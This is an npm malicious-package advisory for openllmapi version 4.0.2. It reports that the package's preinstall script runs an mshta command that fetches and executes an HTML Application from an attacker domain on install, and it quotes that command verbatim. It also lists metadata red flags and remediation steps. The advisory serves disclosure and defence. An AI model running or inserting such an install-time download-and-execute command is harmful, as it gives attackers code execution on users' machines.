npm · Malicious package advisory
Malwareopenllmapi
MAL-2026-6364
Malicious code in openllmapi (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41)
The package's preinstall lifecycle script (preinstall.js line 3) runs `cmd /c "mshta http://fixars.top"`, which causes Windows mshta.exe to download and execute an HTML Application from the attacker-controlled domain fixars.top over plain HTTP. This fires automatically on `npm install` and yields arbitrary code execution on the installer's machine with the user's privileges. The package metadata is consistent with a throwaway malicious publish: empty author, no repository or homepage, and a generic description ('Node.js wrapper for OpenLLM API service.') that does not match the install-time behavior.
Compromised versions (1)
- 4.0.2
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.